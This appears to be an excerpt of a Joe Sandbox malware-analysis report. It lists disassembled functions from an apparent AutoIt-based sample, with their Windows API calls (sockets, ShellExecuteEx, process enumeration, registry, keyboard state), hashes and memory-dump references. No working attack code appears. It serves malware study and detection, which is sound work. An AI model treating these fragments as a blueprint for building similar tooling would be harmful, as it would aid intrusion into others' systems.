                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                    • String ID:
                                    • API String ID: 1422805418-0
                                    • Opcode ID: 4bac23f9a0968694c2bb1b5e3b2a6e42e50b9587834f1cbd0d1ec8db1659e069
                                    • Instruction ID: 80aad46be103e582b788da1ce5f79635736762a19cc7cd2b4cd1807e58a0f78b
                                    • Opcode Fuzzy Hash: 4bac23f9a0968694c2bb1b5e3b2a6e42e50b9587834f1cbd0d1ec8db1659e069
                                    • Instruction Fuzzy Hash: B0413771940205DBEB148F68D94176CB7A0BF14326F918319EC39AF2D2E7B49948CB91
                                    Function 00198ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 00198EE4
                                    • GetDC.USER32(00000000), ref: 00198EEC
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00198EF7
                                    • ReleaseDC.USER32(00000000,00000000), ref: 00198F03
                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00198F3F
                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00198F50
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0019BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00198F8A
                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00198FAA
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                    • String ID:
                                    • API String ID: 3864802216-0
                                    • Opcode ID: 14f15ac93d005be54447937b88cc22b1dccdcf54cddff7b30afe8fff1a4ecf29
                                    • Instruction ID: 31a59882cdf80e89f4831fa356bfcb1c808f9f419f29c5ef2d97776d80037d03
                                    • Opcode Fuzzy Hash: 14f15ac93d005be54447937b88cc22b1dccdcf54cddff7b30afe8fff1a4ecf29
                                    • Instruction Fuzzy Hash: 07316B72200214BFEF148F50DC8AFEA3BA9EF4A715F044165FE09DA191EBB59881CB70
                                    Function 001895BF Relevance: 10.7, APIs: 7, Instructions: 247networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • select.WS2_32 ref: 00189691
                                    • WSAGetLastError.WS2_32(00000000), ref: 0018969E
                                    • __WSAFDIsSet.WS2_32(00000000,?), ref: 001896C8
                                    • WSAGetLastError.WS2_32(00000000), ref: 001896F8
                                    • htons.WS2_32(?), ref: 001897AA
                                    • inet_ntoa.WS2_32(?), ref: 00189765
                                      • Part of subcall function 0016D2FF: _strlen.LIBCMT ref: 0016D309
                                    • _strlen.LIBCMT ref: 00189800
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                    • String ID:
                                    • API String ID: 3480843537-0
                                    • Opcode ID: 412a0a1b37e8cc37814be0481352b6d8b4c4cac477466732b62ba28b3dbb5060
                                    • Instruction ID: 2b7b13d92fb2fc921611c5a919728c0d3fd6277a7dd029794414ee890d681aa4
                                    • Opcode Fuzzy Hash: 412a0a1b37e8cc37814be0481352b6d8b4c4cac477466732b62ba28b3dbb5060
                                    • Instruction Fuzzy Hash: AC81CD31504200AFC714EF64DC86E6BBBF9EFA9714F144A2DF5559B2A1EB30DA04CB92
                                    Function 0014AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9ba7d2ce8652f5cdff1a738e89f48039b9f2bc06288f0b5e2d0cba79072904de
                                    • Instruction ID: b0619921f4aa28038c766ab7f272f1cbcfa1557c60509ab5b5dc9c0c3c9a8d10
                                    • Opcode Fuzzy Hash: 9ba7d2ce8652f5cdff1a738e89f48039b9f2bc06288f0b5e2d0cba79072904de
                                    • Instruction Fuzzy Hash: E7717DB1944109EFDB08CF98CC88AAEBB74FF85314F158159F915AB261D730AA45CF61
                                    Function 00192230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 0019225A
                                    • _memset.LIBCMT ref: 00192323
                                    • ShellExecuteExW.SHELL32(?), ref: 00192368
                                      • Part of subcall function 0013936C: __swprintf.LIBCMT ref: 001393AB
                                      • Part of subcall function 0013936C: __itow.LIBCMT ref: 001393DF
                                      • Part of subcall function 0014C6F4: _wcscpy.LIBCMT ref: 0014C717
                                    • CloseHandle.KERNEL32(00000000), ref: 0019242F
                                    • FreeLibrary.KERNEL32(00000000), ref: 0019243E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                    • String ID: @
                                    • API String ID: 4082843840-2766056989
                                    • Opcode ID: 2cd710c370920c40e58250dce6ab7b4fd1444f6b1a26f4125c09815c1e124997
                                    • Instruction ID: 307352cf81eadfd7fd6debc0eb736d89dfa637010667cc979c1143b88f18e441
                                    • Opcode Fuzzy Hash: 2cd710c370920c40e58250dce6ab7b4fd1444f6b1a26f4125c09815c1e124997
                                    • Instruction Fuzzy Hash: 9C7170B4A00619EFCF05EFA4D8959AEB7F5FF58310F108459E859AB361DB34AE40CB90
                                    Function 00173BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetParent.USER32(00000000), ref: 00173C02
                                    • GetKeyboardState.USER32(?), ref: 00173C17
                                    • SetKeyboardState.USER32(?), ref: 00173C78
                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00173CA4
                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00173CC1
                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00173D05
                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00173D26
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: 09afa4c893aaa532844096ea060e55a023d5588c2535160c1e52fb67ff5edba3
                                    • Instruction ID: 24a8b11d386d4897788f109bf1ded7d70b6db8e38fc904942fc74d703accd2d1
                                    • Opcode Fuzzy Hash: 09afa4c893aaa532844096ea060e55a023d5588c2535160c1e52fb67ff5edba3
                                    • Instruction Fuzzy Hash: 7051B1A05486D539FB378364CC45BB6BEB9AB06300F08C589E1ED5A8C2D795EE84F760
                                    Function 00198FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00198FE7
                                    • GetWindowLongW.USER32(017495B0,000000F0), ref: 0019901A
                                    • GetWindowLongW.USER32(017495B0,000000F0), ref: 0019904F
                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00199081
                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 001990AB
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 001990BC
                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001990D6
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: LongWindow$MessageSend
                                    • String ID:
                                    • API String ID: 2178440468-0
                                    • Opcode ID: 7b771961327045db9726d533f5657e1a766a5bbd6445f18ec424ec678a523518
                                    • Instruction ID: 7cf303a760976aface8ccfdb4a053c3f1b6891cbb3fc25dfe4a7a415ae1964ac
                                    • Opcode Fuzzy Hash: 7b771961327045db9726d533f5657e1a766a5bbd6445f18ec424ec678a523518
                                    • Instruction Fuzzy Hash: 69312A35600215EFDF208F58DC85F6537B9FB4A724F1902A8F529CB6B1CBB2A880DB41
                                    Function 001708AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001708F2
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00170918
                                    • SysAllocString.OLEAUT32(00000000), ref: 0017091B
                                    • SysAllocString.OLEAUT32(?), ref: 00170939
                                    • SysFreeString.OLEAUT32(?), ref: 00170942
                                    • StringFromGUID2.COMBASE(?,?,00000028), ref: 00170967
                                    • SysAllocString.OLEAUT32(?), ref: 00170975
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                    • String ID:
                                    • API String ID: 3761583154-0
                                    • Opcode ID: 540fe71daa3449790b4725efa101d4bc79e5bc13640e60e9523da92976276970
                                    • Instruction ID: 9c206aa01b7fb4b19e265d2e3eda2b1e8f0d8549a1a167a3588a921af7438f7c
                                    • Opcode Fuzzy Hash: 540fe71daa3449790b4725efa101d4bc79e5bc13640e60e9523da92976276970
                                    • Instruction Fuzzy Hash: CA219576601319AFAB159F68DC88DAB73BCEB0D364B00C225FA1DDB251E770EC458B60
                                    Function 00172472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                    • API String ID: 1038674560-2734436370
                                    • Opcode ID: 2ae228d04467e39c2c54e15bbe26cbba42667d55678a06588975f7722656bd78
                                    • Instruction ID: e1e62a2aadf3f7d1fb5735c21bc1d9d2a957d2d549042f3363414e0f4d4eec9a
                                    • Opcode Fuzzy Hash: 2ae228d04467e39c2c54e15bbe26cbba42667d55678a06588975f7722656bd78
                                    • Instruction Fuzzy Hash: B2213772204211B7C325AA349C12FBBB3B8EF75310F65C029F88E9B185E7719943C395
                                    Function 00170986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001709CB
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001709F1
                                    • SysAllocString.OLEAUT32(00000000), ref: 001709F4
                                    • SysAllocString.OLEAUT32 ref: 00170A15
                                    • SysFreeString.OLEAUT32 ref: 00170A1E
                                    • StringFromGUID2.COMBASE(?,?,00000028), ref: 00170A38
                                    • SysAllocString.OLEAUT32(?), ref: 00170A46
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                    • String ID:
                                    • API String ID: 3761583154-0
                                    • Opcode ID: dde0f3b384496ca9939dc03c9b96eb19224eca96398acbc2d832acefd514fb6b
                                    • Instruction ID: 2614e37153b3a4d1f85d47a4bbee2b0bc4752a424f05cc6a6a39196b2e9adcaf
                                    • Opcode Fuzzy Hash: dde0f3b384496ca9939dc03c9b96eb19224eca96398acbc2d832acefd514fb6b
                                    • Instruction Fuzzy Hash: F4215E75204304AF9B159BACDC88DAB77ACEB0C360B01C125F909CB6A1EB70EC818B64
                                    Function 0019A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0014D1BA
                                      • Part of subcall function 0014D17C: GetStockObject.GDI32(00000011), ref: 0014D1CE
                                      • Part of subcall function 0014D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0014D1D8
                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0019A32D
                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0019A33A
                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0019A345
                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0019A354
                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0019A360
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$CreateObjectStockWindow
                                    • String ID: Msctls_Progress32
                                    • API String ID: 1025951953-3636473452
                                    • Opcode ID: e56889b1a33be822f5ef680e658f3a7a82abc2dd163325dafd353576c2305e97
                                    • Instruction ID: 2ed840c9e7efbb78bdb7e05a785445c06c8bc1a60df1854685c84d94bfb8d85e
                                    • Opcode Fuzzy Hash: e56889b1a33be822f5ef680e658f3a7a82abc2dd163325dafd353576c2305e97
                                    • Instruction Fuzzy Hash: A711B2B1150219BEEF159F61CC85EEB7F6DFF08798F014114FA08A60A0C772AC21DBA4
                                    Function 0014CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClientRect.USER32(?,?), ref: 0014CCF6
                                    • GetWindowRect.USER32(?,?), ref: 0014CD37
                                    • ScreenToClient.USER32(?,?), ref: 0014CD5F
                                    • GetClientRect.USER32(?,?), ref: 0014CE8C
                                    • GetWindowRect.USER32(?,?), ref: 0014CEA5
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Rect$Client$Window$Screen
                                    • String ID:
                                    • API String ID: 1296646539-0
                                    • Opcode ID: 0a9074b3879b93fc5cea099d22c0137d835c82bb875051890f1277bd0393f925
                                    • Instruction ID: f181e4eeb92540ca526142c20daa696894b96efd60c4b563eabb57b5fd01ef6d
                                    • Opcode Fuzzy Hash: 0a9074b3879b93fc5cea099d22c0137d835c82bb875051890f1277bd0393f925
                                    • Instruction Fuzzy Hash: A0B14E79A00649DBDF54CFA8C5807EDBBB1FF08310F159529EC59EB260EB30A950CBA4
                                    Function 00191BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00191C18
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00191C26
                                    • __wsplitpath.LIBCMT ref: 00191C54
                                      • Part of subcall function 00151DFC: __wsplitpath_helper.LIBCMT ref: 00151E3C
                                    • _wcscat.LIBCMT ref: 00191C69
                                    • Process32NextW.KERNEL32(00000000,?), ref: 00191CDF
                                    • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00191CF1
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                    • String ID:
                                    • API String ID: 1380811348-0
                                    • Opcode ID: ff84c070ae897c6115cb058c9d5b1f01cecb7c20b52d6800791d3e5ef1fa4cc4
                                    • Instruction ID: 21573d7a2c826294c82cfc6c14f32fbc38b375432a6c73489eeba9cedf8a9bf3
                                    • Opcode Fuzzy Hash: ff84c070ae897c6115cb058c9d5b1f01cecb7c20b52d6800791d3e5ef1fa4cc4
                                    • Instruction Fuzzy Hash: 48519F71504301AFD720EF64D885EABB7ECEF98754F00492EF98997291EB70DA44CB92
                                    Function 00192FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00193C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00192BB5,?,?), ref: 00193C1D
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001930AF
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001930EF
                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00193112
                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0019313B
                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0019317E
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0019318B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                    • String ID:
                                    • API String ID: 3451389628-0
